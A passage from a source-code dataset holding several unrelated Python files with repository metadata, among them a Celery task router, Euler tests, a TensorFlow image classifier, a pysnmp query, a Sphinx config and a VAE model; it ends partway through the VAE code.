daa82ba337e7c7ea48f602e231247e8415e0c3dc | 805fbd9aead4fc2998fd5d8790043a20b2656915 | /data_format/__init__.py | cb3c33b9d09bcf03a38af8f8bdd84bd066689fa1 | [] | no_license | chenhaomingbob/ToolBox | f9a6ef64352c85ae84c44e9fab53aab74992c7c5 | 962304c004aa39e8a5bcb153def9dc3895595c9f | refs/heads/master | 2021-05-19T00:37:23.170766 | 2020-06-01T10:57:05 | 2020-06-01T10:57:05 | 251,496,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | #!/usr/bin/python
# -*- coding:utf8 -*-
"""
Author: Haoming Chen
E-mail: chenhaomingbob@163.com
Time: 2020/03/23
Description:
""" | [
"chenhaomingbob@163.com"
] | chenhaomingbob@163.com |
9101fd59a62f04ff3e06d28da7e5ee90c839b959 | 9a123c2a3be7dbd2d5c60a4e5830b903b9b6e552 | /module_build_service/scheduler/route.py | c74c78c626070f3e1d87114f4ea7d177a11a4299 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | James6xie/fm-orchestrator | d3b24093d1c635142dc57262382fdae869cd82b1 | d3656b159b457126f99c323f49572809c7afc47d | refs/heads/master | 2023-02-19T04:35:25.791000 | 2020-11-30T19:25:13 | 2020-12-04T12:08:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,991 | py | # -*- coding: utf-8 -*-
# SPDX-License-Identifier: MIT
""" Define the router used to route Celery tasks to queues."""
from __future__ import absolute_import
import inspect
from module_build_service.common import conf, log, models
from module_build_service.scheduler.db_session import db_session
from module_build_service.scheduler.handlers.greenwave import get_corresponding_module_build
def route_task(name, args, kwargs, options, task=None, **kw):
"""
Figure out module build id from task args and route task to queue
per the module build id.
Each celery worker will listens on two queues:
1. mbs-default
2. mbs-{number} # where number is "module_build_id % conf.num_workers"
If a task is associated with a module build, route it to the queue
named "mbs-{number}", otherwise, route it to "mbs-default", this is to ensure
tasks for a module build can run on the same worker serially.
"""
queue_name = "mbs-default"
module_build_id = None
num_workers = conf.num_workers
module, handler_name = name.rsplit(".", 1)
handler = getattr(__import__(module, fromlist=[handler_name]), handler_name)
# handlers can be decorated, inspect the original function
while getattr(handler, "__wrapped__", None):
handler = handler.__wrapped__
handler_args = inspect.getargspec(handler).args
def _get_handler_arg(name):
index = handler_args.index(name)
arg_value = kwargs.get(name, None)
if arg_value is None and len(args) > index:
arg_value = args[index]
return arg_value
if "module_build_id" in handler_args:
module_build_id = _get_handler_arg("module_build_id")
# if module_build_id is not found, we may be able to figure it out
# by checking other arguments
if module_build_id is None:
if "task_id" in handler_args:
task_id = _get_handler_arg("task_id")
component_build = models.ComponentBuild.from_component_event(db_session, task_id)
if component_build:
module_build_id = component_build.module_build.id
elif "tag_name" in handler_args:
tag_name = _get_handler_arg("tag_name")
module_build = models.ModuleBuild.get_by_tag(db_session, tag_name)
if module_build:
module_build_id = module_build.id
elif "subject_identifier" in handler_args:
module_build_nvr = _get_handler_arg("subject_identifier")
module_build = get_corresponding_module_build(module_build_nvr)
if module_build is not None:
module_build_id = module_build.id
if module_build_id is not None:
queue_name = "mbs-{}".format(module_build_id % num_workers)
taskinfo = {"name": name, "args": args, "kwargs": kwargs, "options": options, "kw": kw}
log.debug("Routing task '{}' to queue '{}'. Task info:\n{}".format(name, queue_name, taskinfo))
return {"queue": queue_name}
| [
"mprahl@redhat.com"
] | mprahl@redhat.com |
d3743b3de00d52481bf2c74a20fb31405afce4c4 | fb81442e5d2e940ad967bd0a264b7918d739173f | /py_test.py | 49e8b365b34d93965925230a57e83abad11d1008 | [] | no_license | Amertz08/euler_py | 054f45d110b8cf4d0e9afeb7f5c608026226443c | 0dd217c9e0a061e3622fd150b61e24a2c6bad5af | refs/heads/master | 2021-05-06T23:15:42.742578 | 2017-12-07T00:16:31 | 2017-12-07T00:16:31 | 112,960,695 | 0 | 1 | null | 2017-12-06T20:32:57 | 2017-12-03T20:21:48 | C | UTF-8 | Python | false | false | 515 | py | import euler_py as eul
def test_problem_one():
result = eul.problem_one(10)
assert result == 23, f'Problem 1 should be 23: {result}'
def test_problem_two():
result = eul.problem_two(89)
assert result == 44, f'Problem 2 should be 44: {result}'
def test_problem_three():
result = eul.problem_three(13195)
assert result == 29, f'Problem 3 should be 29: {result}'
def test_problem_four():
result = eul.problem_four(2)
assert result == 9009, f'Problem 4 should be 9009: {result}'
| [
"adammertz@gmail.com"
] | adammertz@gmail.com |
554e8005df3b5bf36200e2b33f236db5ab36f2ee | 530675a299158bb28d61c41920ea9799b4cdb304 | /source/image_classifier.py | 45f23b8d99e14ccacf1b0f79053f6988a3fb7d29 | [] | no_license | srikanthsrnvs/astrum | 60e54d519c526c7b63c0a593484ebace0cdb936d | d09e5af0266e832d902b6ece09536a7d089bf14d | refs/heads/master | 2022-07-07T11:02:38.386896 | 2020-05-03T18:14:46 | 2020-05-03T18:14:46 | 231,634,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,665 | py | import io
import os
import random
import re
import shutil
import zipfile
from pathlib import Path
import numpy as np
import requests
import tensorflow as tf
from PIL import Image
from tensorflow.python import keras
from tensorflow.python.keras.optimizers import *
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from custom_lenet import CustomLeNet
from firebase import FirebaseHelper
from job import Job
from saving_worker import SavingWorker
class ImageClassifier:
def __init__(self, job, log_dir, finished_queue, cv):
self.cv = cv
self.log_dir = log_dir
self.job = job
self.finished_queue = finished_queue
self.hyperparameters = {}
self.firebase_helper = FirebaseHelper()
self.job_files_path = Path(str(Path.home())+'/JobFiles/'+self.job.id)
def __save(self):
self.model.save(str(self.job_files_path)+'/model.h5')
with tf.keras.backend.get_session() as sess:
tf.saved_model.simple_save(
sess,
str(self.job_files_path)+'/ServingModel/1',
inputs={'input_image': self.model.input},
outputs={t.name: t for t in self.model.outputs}
)
self.finished_queue.append(
{'job': self.job, 'label_map': self.label_map, 'stats': self.stats})
self.cv.notifyAll()
shutil.rmtree('./'+self.job.filename)
def build(self):
self._prepare_data()
self._prepare_hyperparameters()
model = CustomLeNet(self.output_classes,
self.hyperparameters['optimizer'], self.hyperparameters['output_activation'], self.hyperparameters['loss']).model
train_datagen = ImageDataGenerator(
rescale=1. / 255,
width_shift_range=0.2,
height_shift_range=0.2,
horizontal_flip=True,
vertical_flip=True
)
test_datagen = ImageDataGenerator(
rescale=1. / 255,
width_shift_range=0.2,
height_shift_range=0.2,
horizontal_flip=True,
vertical_flip=True
)
train_generator = train_datagen.flow_from_directory(
self.job.filename+'/train',
target_size=(self.input_size[0], self.input_size[1]),
batch_size=self.train_batch_size
)
validation_generator = test_datagen.flow_from_directory(
self.job.filename+'/test',
target_size=(self.input_size[0], self.input_size[1]),
batch_size=self.test_batch_size
)
tensorboard_callback = keras.callbacks.TensorBoard(
log_dir=self.log_dir+'/scalars/')
stats = model.fit_generator(
train_generator,
steps_per_epoch=self.train_img_count // self.train_batch_size,
epochs=self.hyperparameters['epochs'],
validation_data=validation_generator,
validation_steps=self.test_img_count // self.test_batch_size,
callbacks=[tensorboard_callback]
)
stats = stats.history
train_loss = str(stats.get('loss', '')[-1])
test_loss = str(stats.get('val_loss', '')[-1])
train_acc = str(stats.get('acc', '')[-1])
test_acc = str(stats.get('val_acc', '')[-1])
self.stats = {
'train': {
'accuracy': train_acc,
'loss': train_loss
},
'test': {
'accuracy': test_acc,
'loss': test_loss
}
}
self.model = model
self.label_map = train_generator.class_indices
self.__save()
def _prepare_hyperparameters(self):
hyperparameters = {}
hyperparameters['epochs'] = 100
hyperparameters['learning_rate'] = 0.001
hyperparameters['loss'] = 'categorical_crossentropy'
hyperparameters['momentum'] = 0.9
hyperparameters['decay'] = 0.0
hyperparameters['optimizer'] = Adam(
lr=hyperparameters['learning_rate'])
hyperparameters['output_activation'] = 'softmax'
self.hyperparameters = hyperparameters
def _prepare_data(self):
total_img_count = 0
cumalative_img_height = 0
cumalative_img_width = 0
imgs = {}
r = requests.get(self.job.download_link)
f = io.BytesIO(r.content)
z = zipfile.ZipFile(f)
z.extractall()
filename = z.filelist[0].filename.strip('/')
self.job.set_filename(filename)
for folder in os.listdir(filename):
path = filename+'/'+folder
imgs[folder] = []
for img_name in os.listdir(path):
# TODO: Error handling if a file is not an image
img = Image.open(os.path.join(path, img_name))
imgs[folder].append({'image': img, 'name': img_name})
total_img_count += 1
img_height, img_width = img.size
cumalative_img_height += img_height
cumalative_img_width += img_width
# img_size = int(max(cumalative_img_height/total_img_count,
# cumalative_img_width/total_img_count))
# TODO: Image size is constant here, need to make dynamic
img_size = 299
# Save all images by splitting into /test & /train
train_img_count = 0
test_img_count = 0
for key, img_data in imgs.items():
os.makedirs(filename+'/train/'+key)
os.makedirs(filename+'/test/'+key)
# Reshape all images
dataset_size = len(img_data)
split = int(dataset_size * 0.7)
train_imgs = img_data[0:split]
test_imgs = img_data[split:]
for im in train_imgs:
train_img_count += 1
img = im['image'].resize((img_size, img_size))
img.save(filename+'/train/{}/{}'.format(key,
im['name']))
for im in test_imgs:
test_img_count += 1
img = im['image'].resize((img_size, img_size))
img.save(filename+'/test/{}/{}'.format(key,
im['name']))
# cleanup
shutil.rmtree(filename+'/'+key)
self.train_batch_size = min(16, train_img_count)
self.test_batch_size = min(16, test_img_count)
self.train_img_count = train_img_count
self.test_img_count = test_img_count
self.input_size = (img_size, img_size, 3)
self.output_classes = len(imgs.keys())
| [
"srikanth.srinivas@mail.utoronto.ca"
] | srikanth.srinivas@mail.utoronto.ca |
ad38dda9c96e041243e59ad235effe29e381f2a1 | 5a633b40ecc7a2178d38a9a660877445959e2a48 | /snmp.py | 12234fb3638ff0f101c3d42538b2de85224b36fd | [] | no_license | rkuma238/test_framework | 4a087efc398047afd466ac6b69afc0c23e9424aa | 93a2e696c69ca98faa549d7547f1482bba3d9b40 | refs/heads/master | 2021-09-14T22:57:49.348206 | 2018-05-21T16:29:16 | 2018-05-21T16:29:16 | 113,644,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | from pysnmp.hlapi import *
errorIndication, errorStatus, errorIndex, varBinds = next( getCmd(SnmpEngine(),CommunityData('uTdc9j48PBRkxn5DcSjchk', mpModel=0),UdpTransportTarget(('uTdc9j48PBRkxn5DcSjchk', 161)), ContextData(), ObjectType('.1.3.6.1.2.1.2.2.1'))
if errorIndication:
print(errorIndication)
elif errorStatus:
print('%s at %s' % (errorStatus.prettyPrint(),errorIndex and varBinds[int(errorIndex) - 1][0] or '?'))
else:
for varBind in varBinds:
print(' = '.join([x.prettyPrint() for x in varBind])) | [
"rakesh.helva@gmail.com"
] | rakesh.helva@gmail.com |
516373953da84479aba9b11e0bae3dbf7d26ccf5 | bb41814dc79f56a082a777e17ed31320db43edf4 | /reinforcement_learning/0x00-q_learning/4-play.py | d6b4d54e98814a6ad8799721a6031a8177cbde91 | [] | no_license | garimasinghgryffindor/holbertonschool-machine_learning | a92c619b6ad2d110ed97b33fa9903f5134c96866 | 856ee36006c2ff656877d592c2ddb7c941d63780 | refs/heads/master | 2023-08-01T09:58:13.863062 | 2020-11-28T00:50:55 | 2020-11-28T00:50:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | #!/usr/bin/env python3
"""
Has the trained agent play an episode
"""
import numpy as np
def play(env, Q, max_steps=100):
"""
Has the trained agent play an episode
:param env: is the FrozenLakeEnv instance
:param Q: is a numpy.ndarray containing the Q-table
:param max_steps: is the maximum number of steps in the episode
:return: the total rewards for the episode
"""
state = env.reset()
env.render()
for step in range(max_steps):
action = np.argmax(Q[state])
new_state, reward, done, info = env.step(action)
env.render()
if done:
return reward
state = new_state
env.close()
| [
"kenneth.ca95@gmail.com"
] | kenneth.ca95@gmail.com |
382df4a26d5fccd404d05e1cd04e27a56be1202a | 8cb9e6cb1e626c18952e6514dfeff267f1ca3f35 | /doc/conf.py | ebe3e0381c1f950adc1f0c230a7b003a8f609fd8 | [
"SHL-0.51",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | rudyyao/zero-riscy | ec4cd86e2818dcf992ae13083f793acfaad102ac | 8c70fcf2b2de255d03cebc57cbc5939f57dd699e | refs/heads/master | 2020-04-01T13:02:22.239991 | 2018-12-04T05:42:20 | 2018-12-04T05:42:20 | 153,234,384 | 0 | 0 | NOASSERTION | 2018-12-04T05:42:21 | 2018-10-16T06:33:47 | SystemVerilog | UTF-8 | Python | false | false | 5,124 | py | # -*- coding: utf-8 -*-
#
# zero-riscy documentation build configuration file, created by
# sphinx-quickstart on Thu Nov 8 15:42:18 2018.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
numfig=True
numfig_format = {'figure': 'Figure %s', 'table': 'Table %s', 'code-block': 'Listing %s'}
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinxcontrib.wavedrom']
wavedrom_html_jsinline = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ZERO-RISCY'
copyright = u'2017-2018, ETH Zurich and University of Bologna'
author = u'Pasquale Davide Schiavone'
from setuptools_scm import get_version
release = get_version(root='..', relative_to=__file__)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
#release = u''
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'venv']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
}
html_logo = 'images/pulp.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'zero-riscydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'zero-riscy.tex', u'ZERO-RISCY Documentation',
u'ETH Zurich and University of Bologna', 'manual'),
]
latex_logo = 'images/pulp_title.png'
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'zero-riscy', u'zero-riscy Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'zero-riscy', u'zero-riscy Documentation',
author, 'zero-riscy', 'One line description of project.',
'Miscellaneous'),
]
| [
"stefan@wallentowitz.de"
] | stefan@wallentowitz.de |
dd46d0c6385af0b92cb586eebf7cd3183305325b | 6394118fe656ead590e5ea8f390b77556ff70905 | /examples/macromols/invalid.py | 55199ba3e0612d53147f29178e1e6026c6d45b77 | [] | no_license | pdJeeves/MCell-Test-Framework | bcb6bc801dedfa3f954da5a0b4e38c14cb958d25 | a3b807ae5f5a6317854744eba1b845e58ef74b20 | refs/heads/master | 2020-12-24T13:52:34.364129 | 2014-05-02T14:23:28 | 2014-05-02T14:23:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | """
Macromolecule {parser} {'error handling'}
Author: {'Jed Wing'} <jed@salk.edu>
Date: {2008/04/04}
"""
for i in range(1, 40):
MCellTest("invalid-{0:02d}.mdl".format(i))
| [
"pdJeeves@zoho.com"
] | pdJeeves@zoho.com |
9a425b697c4550fd39bb3ac55fae5dffea1daf02 | 9cabe395035e3e344dcf0d83baa20bcdefec969e | /ITSC.py | 54425d2cbb84ee5b0ebf0805a648013f8d2c9844 | [] | no_license | dagomankle/LukeBox | 11703ab6ea0079e98649f41e23b5f780e33d3611 | 2b86167f2c3f6717194751f2e6ee605fb48858a2 | refs/heads/master | 2020-03-12T17:50:11.556813 | 2018-04-23T19:29:52 | 2018-04-23T19:29:52 | 130,737,144 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,280 | py | import cv2
import matplotlib.pyplot as plt
import numpy as np
import math
import pyaudio
import wave
def mostrarImagenInicialEstandard(nombre, x,y):
imagen = cv2.imread(nombre)
imagenStandard = cv2.resize(imagen, (x,y))
cv2.imshow("Imagen a Convertir",imagenStandard)
return imagenStandard
def obtenerMatricesBGR(imagenStandard, x,y):
b = np.zeros((y,x))
g = np.zeros((y,x))
r = np.zeros((y,x))
for n in list(range(y)):
for m in list(range(x)):
b[n][m] = ((imagenStandard[n][m])[0])
g[n][m] = ((imagenStandard[n][m])[1])
r[n][m] = ((imagenStandard[n][m])[2])
cv2.imwrite("recursosImg/rgb/blue.jpg", b)
cv2.imwrite("recursosImg/rgb/green.jpg", g)
cv2.imwrite("recursosImg/rgb/red.jpg", r)
bgr = [b,g,r]
return bgr
def obtenerPixelLbp(color, n, m):
exponente = 0
exponentes = [6,7,0,1,2,3,4,5]
pixelLpbB = 0
pixelLpbG = 0
pixelLpbR = 0
valorCentral0 = (color[0])[n][m]
valorCentral1 = (color[1])[n][m]
valorCentral2 = (color[2])[n][m]
for k in list(range(n-1,n+2)):
for j in list(range(m-1,m+2)):
if k != n and j != m:
if (color[0])[k][j] <= valorCentral0:
pixelLpbB = pixelLpbB + pow(2,exponentes[exponente])
if (color[1])[k][j] <= valorCentral1:
pixelLpbG = pixelLpbG + pow(2,exponentes[exponente])
if (color[2])[k][j] <= valorCentral2:
pixelLpbR = pixelLpbR + pow(2,exponentes[exponente])
exponente = exponente+1
return [pixelLpbB,pixelLpbB,pixelLpbR]
def obtenerColor(imagenStandard, n , m):
color =[ 0,0,0]
for k in list(range(n-1,n+2)):
for j in list(range(m-1,m+2)):
color[0] = color[0]+(imagenStandard[n][m])[0]
color[1] = color[1]+(imagenStandard[n][m])[1]
color[2] = color[2]+(imagenStandard[n][m])[2]
color = [int(color[0]/9),int(color[1]/9),int(color[2]/9)]
return color
def obtenerValoresConversion(imagenStandard,bgr,x,y, compresionNumber):
cn = 0
matOrigen= bgr
valoresConversion=[]
while cn <= compresionNumber:
puntosX = int((x-1)/3)
puntosY = int((y-1)/3)
lbpB = np.zeros((puntosY ,puntosX))
lbpG = np.zeros((puntosY ,puntosX))
lbpR = np.zeros((puntosY ,puntosX))
#colores = np.ndarray((puntosY ,puntosX))
colores = x = [[ [0,0,0] for i in range(puntosX)] for j in range(puntosY)]
if cn == compresionNumber:
lbpU = np.zeros((puntosY ,puntosX))
lbpF = np.zeros((puntosY ,puntosX))
canal = np.zeros((puntosY ,puntosX))
view = np.zeros((puntosY ,puntosX))
sonidoPorPixelI = np.zeros((puntosY ,puntosX))
sonidoPorPixelF = np.zeros((puntosY ,puntosX))
sonidoPorPixelM = np.zeros((puntosY ,puntosX))
for n in list(range(1,puntosY +1)):
for m in list(range(1,puntosX +1)):
o = 0
p = 0
if m != 1:
o = 3
if n != 1:
p = 3
lbpS = obtenerPixelLbp(matOrigen, n+p, m+o)
lbpB[n-1][m-1] = lbpS[0]
lbpG[n-1][m-1] = lbpS[1]
lbpR[n-1][m-1] = lbpS[2]
colores[n-1][m-1]= obtenerColor(imagenStandard,n+p,m+o)
if cn == compresionNumber:
d = colores[n-1][m-1]#revisar
lbpU[n-1][m-1] = lbpB[n-1][m-1] +lbpG[n-1][m-1] +lbpR[n-1][m-1]
lbpF[n-1][m-1] = lbpU[n-1][m-1] + d[0] + d[1]+ d[2]
view[n-1][m-1] = (lbpF[n-1][m-1]) *0.166
sonidoPorPixelI[n-1][m-1] = 40+9*lbpF[n-1][m-1]+lbpF[n-1][m-1]
sonidoPorPixelF[n-1][m-1] = sonidoPorPixelI[n-1][m-1] +9
sonidoPorPixelM[n-1][m-1] = sonidoPorPixelI[n-1][m-1] +4
print("testo")
print(d[0])
print(d[1])
print(d[2])
if d[0]> d[1] and d[0] > d[2]:
canal[n-1][m-1] = 0
elif d[2] > d[1] and d[2] > d[0]:
canal[n-1][m-1] = 2
else:
canal[n-1][m-1] = 1
print("canal")
print(canal[n-1][m-1])
print(canal)
valoresConversion = [lbpB,lbpG,lbpR, lbpU,lbpF, canal, sonidoPorPixelI, sonidoPorPixelF, sonidoPorPixelM, puntosX,puntosY]
matOrigen = [lbpB,lbpG,lbpR]
x = puntosX
y = puntosY
imagenStandard = colores
cn = cn+1
print(lbpF)
print("el toro")
print(lbpU)
cv2.imwrite("recursosImg/lpbs/lbpBC.jpg", lbpB)
cv2.imwrite("recursosImg/lpbs/lbpGC.jpg", lbpG)
cv2.imwrite("recursosImg/lpbs/lbpRC.jpg", lbpR)
cv2.imwrite("recursosImg/lpbs/lbpUC.jpg", lbpU)
cv2.imwrite("recursosImg/lpbs/lbpFC.jpg", lbpF)
cv2.imwrite("recursosImg/viewBWC.jpg", view)
return valoresConversion
def onda(frecuencia, duracion, rate=44100):
duracion = int(duracion * rate)
factor = float(frecuencia) * (math.pi * 2) / rate
return np.sin(np.arange(duracion) * factor)
def reproducir(stream, senial):
partes = []
partes.append(senial)
parte =np.concatenate(partes) * 0.25
stream.write(parte.astype(np.float32).tostring())
#if __name__ == '__main__':
def obtenerSonidoDeImagen(valoresConversion, numSeg):
sonidoF = []
print(valoresConversion[9])
print(valoresConversion[10])
sonidoPorPixelM = valoresConversion[8]
canal = valoresConversion[5]
print(canal)
cv2.waitKey(0)
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paFloat32,channels=1, rate=44100, output=1)
for n in list(range(valoresConversion[10])):
for m in list(range(valoresConversion[9])):
print(n)
print(m)
print(sonidoPorPixelM[n][m])
print(canal[n][m])
senial = onda(sonidoPorPixelM[n][m],numSeg/(valoresConversion[9]*valoresConversion[10]))
senial2 = onda(40,numSeg/(valoresConversion[9]*valoresConversion[10]))
if canal[n][m] == 0 :
senial_stereo = np.ravel(np.column_stack((senial,senial2)))
elif canal[n][m] == 1:
senial_stereo = np.ravel(np.column_stack((senial,senial)))
else:
senial_stereo = np.ravel(np.column_stack((senial2,senial)))
reproducir(stream,senial_stereo )
stream.close()
p.terminate()
return sonidoF
def inicio(nombreImagen, numSeg, x, y,compresionNumber):
img = mostrarImagenInicialEstandard(nombreImagen, x,y)
bgr = obtenerMatricesBGR(img, x,y)
valoresConversion= obtenerValoresConversion(img,bgr,x,y,compresionNumber)
sonidoDeImagen = obtenerSonidoDeImagen(valoresConversion, numSeg)
cv2.waitKey(0)
#inicio("srcImagenes/carito.jpg", 60, 200,150, 3)
inicio("srcImagenes/escalaX.jpg", 15, 400,300, 2)
print("Graciassss TOTALES!!")
| [
"dagomankle@hotmail.com"
] | dagomankle@hotmail.com |
74bed4d0e8d1e82adc3e789bb419bd92b07ed34e | 3f73130d8072793b267bbcbb7ca45559c03d46cc | /lnets/models/architectures/VAE.py | 77c41d0505fbc188170712e30f70754942cf7612 | [] | no_license | FabianBarrett/Lipschitz_VAEs | 04935e9f9ea9e18ded6bed33bc717cc8b71743bc | 1aece7f16aa2baad5841aab2cd9f75a8c3733e13 | refs/heads/master | 2023-02-28T18:51:07.505336 | 2020-09-28T06:15:21 | 2020-09-28T06:15:21 | 286,734,094 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,828 | py | # BB: Implements the architecture of a VAE with a fully-connected encoder / decoder and diagonal Gaussian posterior
import torch
import torch.nn as nn
import torch.distributions as ds
import numpy as np
from lnets.models.layers import *
from lnets.models.utils import *
from lnets.models.architectures.base_architecture import Architecture
class fcMNISTVAE(Architecture):
def __init__(self, encoder_mean_layers, encoder_std_dev_layers, decoder_layers, input_dim, latent_dim, linear_type, activation, bias=True, config=None, dropout=False):
super(fcMNISTVAE, self).__init__()
self.config = config
# Store size of training set for loss computation purposes.
self.training_set_size = self.config.data.training_set_size
self.input_dim = input_dim
self.latent_dim = latent_dim
self.KL_beta = config.model.KL_beta if 'KL_beta' in config.model else None
self.encoder_mean_layer_sizes = encoder_mean_layers.copy()
self.encoder_mean_layer_sizes.insert(0, self.input_dim) # For bookkeeping purposes.
self.encoder_std_dev_layer_sizes = encoder_std_dev_layers.copy()
self.encoder_std_dev_layer_sizes.insert(0, self.input_dim) # For bookkeeping purposes.
self.decoder_layer_sizes = decoder_layers.copy()
self.decoder_layer_sizes.insert(0, self.latent_dim) # For bookkeeping purposes.
self.encoder_mean_l_constant = self.config.model.encoder_mean.l_constant
self.encoder_std_dev_l_constant = self.config.model.encoder_std_dev.l_constant
self.decoder_l_constant = self.config.model.decoder.l_constant
self.encoder_mean_num_layers = len(self.encoder_mean_layer_sizes)
self.encoder_std_dev_num_layers = len(self.encoder_std_dev_layer_sizes)
self.decoder_num_layers = len(self.decoder_layer_sizes)
self.gamma = config.model.encoder_std_dev.gamma if 'gamma' in config.model.encoder_std_dev else None
# Select activation function and grouping.
self.act_func = select_activation_function(activation)
if 'groupings' in self.config.model.encoder_mean:
self.encoder_mean_groupings = self.config.model.encoder_mean.groupings
self.encoder_mean_groupings.insert(0, -1) # For easier bookkeeping later on.
if 'groupings' in self.config.model.encoder_std_dev:
self.encoder_std_dev_groupings = self.config.model.encoder_std_dev.groupings
self.encoder_std_dev_groupings.insert(0, -1) # For easier bookkeeping later on.
if 'groupings' in self.config.model.decoder:
self.decoder_groupings = self.config.model.decoder.groupings
self.decoder_groupings.insert(0, -1) # For easier bookkeeping later on.
# Select linear layer type.
self.linear_type = linear_type
self.use_bias = bias
self.linear = select_linear_layer(self.linear_type)
encoder_mean_layers = self._get_sequential_layers(activation=activation,
l_constant_per_layer=self.encoder_mean_l_constant ** (1.0 / (self.encoder_mean_num_layers - 1)),
config=config, dropout=dropout, function='encoder_mean')
self.encoder_mean = nn.Sequential(*encoder_mean_layers)
encoder_std_dev_layers = self._get_sequential_layers(activation=activation,
l_constant_per_layer=self.encoder_std_dev_l_constant ** (1.0 / (self.encoder_std_dev_num_layers - 1)),
config=config, dropout=dropout, function='encoder_std_dev')
self.encoder_std_dev = nn.Sequential(*encoder_std_dev_layers)
decoder_layers = self._get_sequential_layers(activation=activation,
l_constant_per_layer=self.decoder_l_constant ** (1.0 / (self.decoder_num_layers - 1)),
config=config, dropout=dropout, function='decoder')
self.decoder = nn.Sequential(*decoder_layers)
self.standard_normal = ds.normal.Normal(torch.tensor(0.0), torch.tensor(1.0))
def forward(self, x):
x = x.view(-1, self.input_dim)
encoder_mean = self.encoder_mean(x)
if self.gamma is None:
encoder_std_dev = self.encoder_std_dev(x)
else:
encoder_std_dev = self.gamma * torch.ones(encoder_mean.shape)
z = encoder_mean + encoder_std_dev * self.standard_normal.sample(encoder_mean.shape)
return self.decoder(z), encoder_mean, encoder_std_dev
def _get_sequential_layers(self, activation, l_constant_per_layer, config, dropout=False, function=None):
# First linear transformation.
# Add layerwise output scaling to control the Lipschitz Constant of the whole network.
layers = list()
if dropout:
layers.append(nn.Dropout(0.2))
layers.append(self.linear(eval('self.' + function + '_layer_sizes')[0], eval('self.' + function + '_layer_sizes')[1], bias=self.use_bias, config=config))
layers.append(Scale(l_constant_per_layer, cuda=self.config.cuda))
for i in range(1, len(eval('self.' + function + '_layer_sizes')) - 1):
# Determine the downsampling that happens after each activation.
if activation == "maxout":
downsampling_factor = (1.0 / eval('self.' + function + '_groupings')[i])
elif activation == "maxmin" or activation == "norm_twist":
downsampling_factor = (2.0 / eval('self.' + function + '_groupings')[i])
else:
downsampling_factor = 1.0
# Add the activation function.
if activation in ["maxout", "maxmin", "group_sort", "norm_twist"]:
layers.append(self.act_func(eval('self.' + function + '_layer_sizes')[i] // eval('self.' + function + '_groupings')[i]))
else:
layers.append(self.act_func())
if dropout:
layers.append(nn.Dropout(0.5))
# Add the linear transformations.
layers.append(
self.linear(int(downsampling_factor * eval('self.' + function + '_layer_sizes')[i]), eval('self.' + function + '_layer_sizes')[i + 1], bias=self.use_bias,
config=config))
layers.append(Scale(l_constant_per_layer, cuda=self.config.cuda))
if function != 'encoder_mean':
layers.append(nn.Sigmoid())
if function == 'encoder_std_dev' and 'desired_radius' in config.model.encoder_std_dev:
# Constrains the encoder standard deviation norm such that certified robustness is met
max_norm = max((1.0 / np.sqrt(8)) * (config.model.encoder_std_dev.desired_radius / self.decoder_l_constant) - 1e-4, 0)
